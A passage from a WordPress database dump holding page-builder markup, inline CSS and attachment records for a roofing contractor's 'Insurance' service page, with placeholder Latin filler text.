style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Insurance</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph -->\n<p>We can assist you through your claims process to insure you have a stress free experience. Damage from downed trees, wind and hail storms may qualify for up to 100% cost coverage by your insurance company. Call Dunrite today for a free inspection to gain helpful insight into the claims process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"64bd9830-1dd5-4212-b98b-e29fc494f308\"} -->\n<style type=\"text/css\"> .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-64bd9830-1dd5-4212-b98b-e29fc494f308 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-64bd9830-1dd5-4212-b98b-e29fc494f308 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"13d889c9-a6a7-4730-aeec-052e90c082e8\"} -->\n<style type=\"text/css\"> .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-13d889c9-a6a7-4730-aeec-052e90c082e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-13d889c9-a6a7-4730-aeec-052e90c082e8\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"25369b66-a5b1-47d5-9393-ea242ec8ece8\"} -->\n<style type=\"text/css\"> .block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-25369b66-a5b1-47d5-9393-ea242ec8ece8 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"baecbea6-554a-432c-931f-e514f567ae29\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baecbea6-554a-432c-931f-e514f567ae29 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-baecbea6-554a-432c-931f-e514f567ae29\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"47d5ece6-7395-4ca6-8e6f-b63c1587f7ec\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-47d5ece6-7395-4ca6-8e6f-b63c1587f7ec.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"b66e007a-d6f9-4030-9a58-98df23139519\"} -->\n<style type=\"text/css\"> .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b66e007a-d6f9-4030-9a58-98df23139519 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-b66e007a-d6f9-4030-9a58-98df23139519 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"389d7fd7-5a95-4aae-84c6-df60c9ee0a8d\"} -->\n<style type=\"text/css\"> .block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"d00f6e3f-2983-46ae-8e86-adf6eb45b88d\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Insurance','','inherit','closed','closed','','226-autosave-v1','','','2022-08-23 18:57:31','2022-08-23 18:57:31','',226,'https://cteisys.com/?p=457',0,'revision','',0),(458,1,'2022-08-23 19:04:14','2022-08-23 19:04:14','','78c60d20331198e3173e4ef3aceda1e4','','inherit','','closed','','78c60d20331198e3173e4ef3aceda1e4','','','2022-08-23 19:04:14','2022-08-23 19:04:14','',226,'https://cteisys.com/wp-content/uploads/2022/08/78c60d20331198e3173e4ef3aceda1e4.jpg',0,'attachment','image/jpeg',0),(459,1,'2022-08-23 19:04:18','2022-08-23 19:04:18','','Capture','','inherit','','closed','','capture','','','2022-08-23 19:04:18','2022-08-23 19:04:18','',226,'https://cteisys.com/wp-content/uploads/2022/08/Capture.jpg',0,'attachment','image/jpeg',0),(460,1,'2022-08-23 19:04:20','2022-08-23 19:04:20','','repair1','','inherit','','closed','','repair1','','','2022-08-23 19:04:20','2022-08-23 19:04:20','',226,'https://cteisys.com/wp-content/uploads/2022/08/repair1.jpg',0,'attachment','image/jpeg',0),(463,1,'2022-08-23 19:09:38','2022-08-23 19:09:38','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"83cb1aa8-0231-4055-b4ea-269bc3094807\"} -->\n<style type=\"text/css\"> .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n 